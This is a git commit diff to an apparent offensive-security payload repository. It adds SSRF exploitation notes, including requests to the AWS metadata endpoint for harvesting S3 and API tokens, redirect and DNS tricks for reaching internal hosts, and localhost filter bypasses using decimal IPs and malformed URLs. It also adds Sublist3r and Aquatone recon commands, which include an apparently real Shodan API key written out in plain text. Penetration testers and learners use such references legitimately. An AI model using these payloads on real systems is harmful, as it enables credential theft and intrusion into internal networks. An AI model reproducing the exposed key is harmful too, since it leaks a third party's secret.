SSRF updates and methodology aquatone tool
parent
7c865ab8aa
commit
f131aebce4
|
@ -48,3 +48,7 @@ List of the top Alexa 100,000 sites with permutations on the TLD and www. For ex
|
|||
* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
|
||||
* https://digi.ninja/projects/bucket_finder.php
|
||||
* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
|
||||
|
||||
|
||||
|
||||
This is one of my favorite tricks. More and more companies host part of their infrastructure on Amazon EC2. Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. Here’s the AWS documentation. If you found an SSRF vulnerability that runs on EC2, try requesting http://169.254.169.254/latest/meta-data/. This will return a lot of useful information for you to understand the infrastructure and may reveal Amazon S3 access tokens, API tokens, and more. You may also want to download http://169.254.169.254/latest/user-data/ and unzip the data.
|
||||
|
|
|
@ -44,6 +44,42 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git
|
|||
./EyeWitness -f rdp.txt --rdp
|
||||
```
|
||||
|
||||
* Using Sublist3r
|
||||
```bash
|
||||
To enumerate subdomains of specific domain and show the results in realtime:
|
||||
python sublist3r.py -v -d example.com
|
||||
|
||||
To enumerate subdomains and enable the bruteforce module:
|
||||
python sublist3r.py -b -d example.com
|
||||
|
||||
To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines
|
||||
python sublist3r.py -e google,yahoo,virustotal -d example.com
|
||||
|
||||
python sublist3r.py -b -d example.com
|
||||
```
|
||||
|
||||
* Using Aquatone
|
||||
```
|
||||
gem install aquatone
|
||||
|
||||
Discover subdomains : results in ~/aquatone/example.com/hosts.txt
|
||||
aquatone-discover --domain example.com
|
||||
aquatone-discover --domain example.com --threads 25
|
||||
aquatone-discover --domain example.com --sleep 5 --jitter 30
|
||||
aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ
|
||||
|
||||
Active scans : results in ~/aquatone/example.com/urls.txt
|
||||
aquatone-scan --domain example.com
|
||||
aquatone-scan --domain example.com --ports 80,443,3000,8080
|
||||
aquatone-scan --domain example.com --ports large
|
||||
aquatone-scan --domain example.com --threads 25
|
||||
|
||||
Final results
|
||||
aquatone-gather --domain example.com
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Passive recon
|
||||
* Using Shodan (https://www.shodan.io/) to detect similar app
|
||||
|
||||
|
@ -186,20 +222,6 @@ More subdomain :
|
|||
gobuster -w wordlist -u URL -r -e
|
||||
```
|
||||
|
||||
* Using Sublist3r
|
||||
```bash
|
||||
To enumerate subdomains of specific domain and show the results in realtime:
|
||||
python sublist3r.py -v -d example.com
|
||||
|
||||
To enumerate subdomains and enable the bruteforce module:
|
||||
python sublist3r.py -b -d example.com
|
||||
|
||||
To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines
|
||||
python sublist3r.py -e google,yahoo,virustotal -d example.com
|
||||
|
||||
python sublist3r.py -b -d example.com
|
||||
```
|
||||
|
||||
* Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
|
||||
```bash
|
||||
#!/bin/bash
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
# Server-Side Request Forgery
|
||||
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
|
||||
# Server-Side Request Forgery
|
||||
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
|
||||
|
||||
## Exploit
|
||||
|
||||
|
@ -17,6 +17,21 @@ http://localhost:443
|
|||
http://localhost:22
|
||||
```
|
||||
|
||||
Advanced exploit using a redirection
|
||||
```
|
||||
1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com
|
||||
2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
|
||||
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
||||
```
|
||||
|
||||
Advanced exploit using type=url
|
||||
```
|
||||
Change "type=file" to "type=url"
|
||||
Paste URL in text field and hit enter
|
||||
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
||||
```
|
||||
|
||||
## Bypassing
|
||||
Bypass localhost with [::]
|
||||
```
|
||||
http://[::]:80/
|
||||
|
@ -30,9 +45,18 @@ Bypass localhost with a domain redirecting to locahost
|
|||
http://n-pn.info
|
||||
```
|
||||
|
||||
-> 11211
|
||||
Bypass using a decimal ip location
|
||||
```
|
||||
http://2130706433/ = http://127.0.0.1
|
||||
http://3232235521/ = http://192.168.0.1
|
||||
http://3232235777/ = http://192.168.1.1
|
||||
```
|
||||
|
||||
Bypass using malformed urls
|
||||
```
|
||||
localhost:+11211aaa
|
||||
localhost:00011211aaaa
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
*
|
||||
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
||||
|
|
Loading…
Reference in New Issue